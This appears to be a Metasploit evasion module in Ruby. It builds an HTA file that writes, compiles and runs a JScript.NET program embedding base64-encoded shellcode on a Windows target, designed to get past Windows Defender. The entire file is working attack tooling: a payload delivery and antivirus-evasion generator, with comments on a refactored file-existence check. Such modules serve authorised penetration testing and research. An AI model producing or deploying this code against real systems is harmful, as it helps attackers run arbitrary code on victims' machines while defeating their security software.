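##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Evasion

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Microsoft Windows Defender Evasive JS.Net and HTA',
        'Description' => %q{
          This module will generate an HTA file that writes and compiles a JScript.NET file
          containing shellcode on the target machine. After compilation, the generated EXE will
          execute the shellcode without interference from Windows Defender.

          It is recommended that you use a payload that uses RC4 or HTTPS for best experience.
        },
        'Author' => [
          'sinmygit',   # PoC
          'Shelby Pace' # Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_X64,
        'Targets' => [ [ 'Microsoft Windows', {} ] ]
      )
    )

    register_options([
      OptString.new(
        'FILENAME',
        [
          true,
          'Filename for the evasive file (default: random)',
          "#{Rex::Text.rand_text_alpha(3..10)}.hta"
        ]
      )
    ])
  end

  # Renders the two templates from the exploits data directory and hands the
  # resulting HTA to file_create.
  #
  # Both templates are evaluated with ERB against this method's +binding+, so
  # the locals defined here (file_payload, jsnet_encoded, fname, arch) are
  # visible to them; jsnet_encoded is not used by the Ruby code itself and is
  # presumably consumed by the HTA template — verify against data/exploits.
  #
  # Fix: the existence check is performed before File.read (previously the
  # read came first, so a missing data file raised Errno::ENOENT and the
  # Failure::NotFound path was unreachable).
  def run
    # This is used in the ERB template
    file_payload = Rex::Text.encode_base64(payload.encoded)
    jsnet_code = read_data_file('evasion_shellcode.js', 'The JScript.NET file was not found.')
    js_file = ERB.new(jsnet_code).result(binding)
    jsnet_encoded = Rex::Text.encode_base64(js_file)

    # This is used in the ERB template
    fname = Rex::Text.rand_text_alpha(6)
    arch = payload_arch_label

    hta = read_data_file('hta_evasion.hta', 'The HTA file was not found.')
    hta_file = ERB.new(hta).result(binding)
    file_create(hta_file)
  end

  private

  # Reads +name+ from the exploits data directory.
  #
  # @param name [String] file name under data/exploits
  # @param missing_msg [String] message passed to fail_with when the file is absent
  # @return [String] the file contents
  # Aborts the run with Failure::NotFound instead of letting File.read raise.
  def read_data_file(name, missing_msg)
    path = File.join(Msf::Config.data_directory, 'exploits', name)
    fail_with(Failure::NotFound, missing_msg) unless File.exist?(path)
    File.read(path)
  end

  # Maps the payload's first architecture to the label used by the template:
  # 'x86' and 'x64' pass through unchanged, anything else becomes 'anycpu'.
  #
  # @return [String]
  def payload_arch_label
    first = payload.arch.first
    %w[x86 x64].include?(first) ? first : 'anycpu'
  end
end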